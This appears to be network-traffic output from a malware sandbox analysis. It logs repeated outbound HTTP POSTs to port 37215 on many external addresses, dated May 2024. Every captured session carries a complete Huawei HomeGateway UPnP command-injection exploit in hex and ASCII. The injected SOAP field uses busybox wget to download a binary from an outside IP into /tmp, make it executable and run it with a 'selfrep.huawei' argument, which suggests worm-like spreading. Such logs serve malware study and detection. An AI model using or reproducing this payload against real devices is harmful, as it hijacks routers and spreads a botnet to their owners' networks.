73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2209192.168.2.134354841.180.21.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737345934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2210192.168.2.1345912158.19.76.21437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737437963 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2211192.168.2.134566041.109.88.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737481117 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2212192.168.2.135923241.181.48.437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737494946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2213192.168.2.1359986197.12.10.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.737700939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2214192.168.2.133720041.178.18.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.738331079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2215192.168.2.135355441.2.84.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.738358974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2216192.168.2.1348272140.28.81.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.738405943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2217192.168.2.1353656157.39.106.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739022970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2218192.168.2.1336516197.68.242.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739069939 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2219192.168.2.1359770197.6.11.14137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.739154100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
